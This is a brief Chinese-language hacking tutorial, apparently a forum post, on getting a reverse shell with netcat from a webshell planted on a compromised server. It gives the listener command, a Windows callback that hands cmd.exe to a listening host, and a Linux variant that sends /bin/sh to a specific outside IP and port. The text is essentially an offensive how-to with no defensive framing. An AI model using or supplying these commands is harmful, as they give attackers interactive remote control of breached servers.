今日中午有某牛牛问我如何使用NC反弹拿shell当时真是冷汗直冒！哎，郁闷，正好此时有空就写出来供某牛牛和小菜们学习一下！

使用NC反弹Shell

在进行Shell反弹时，有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况，例如有的服务器只支持JSP，不支持PHP。此时，可以同样采用Windows下的经典的NC反弹Shell方法。

在Windows下反弹CmdShell时，首先要在本机运行"nc -vv -l -p 端口号"监听端口，然后在WebShell中执行"nc -e cmd.exe 监听主机IP地址 端口"，就可以反弹一个CmdShell。这个方法在Linux中仍然可行，只不过需要作一点小小的改动。

--在本机监听端口后，在WebShell运行nc反弹时，需要发送的是"/bin/sh"，而不是cmd.exe，这样才够反弹发送一个Linux下的Shell命令行窗口给监听主机。例如执行如下命令：

nc 119.1.44.32 8888 -e /bin/sh 即可反弹一个Shell到IP地址为119.1.44.32的监听主机的8888端口。